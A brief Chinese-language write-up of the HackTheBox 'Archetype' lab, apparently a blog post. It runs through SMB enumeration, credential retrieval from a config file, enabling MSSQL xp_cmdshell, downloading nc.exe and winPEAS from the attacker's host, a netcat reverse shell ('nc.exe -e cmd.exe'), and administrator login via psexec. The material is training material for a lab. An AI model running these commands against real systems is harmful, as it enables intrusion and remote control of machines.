HTB- Archetype

端口扫描


nmap -sV -sT 10.129.1.1

image

smbclint

smbclient -L 10.129.149.214

image

获取密码

smbclient  //10.129.149.214/backups
get prod.dtsConfig

image

连接数据库

sudo  impacket-mssqlclient sql_svc@10.129.149.214 -windows-auth

image

开启xp_cmdshell

enable_xp_cmdshell
RECONFIGURE

image

上传nc和提权工具

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.15.72/winPEAS.bat -outfile winPEAS.bat"

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.15.72/nc.exe -outfile nc.exe"

image

开启nc监听 clinet运行nc

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;.\nc.exe -e cmd.exe 10.10.15.72  4444"

image

image

获取user flag

image

运行./winPEAS.bat

image

掉线后重新连接,查询历史记录(等待SQL显示output)

image

账号密码登录

sudo psexec.py administrator@10.129.149.214

image

读取root.txt

image

posted @ 2023-08-11 01:03  Cohawa  阅读(72)  评论(0)    收藏  举报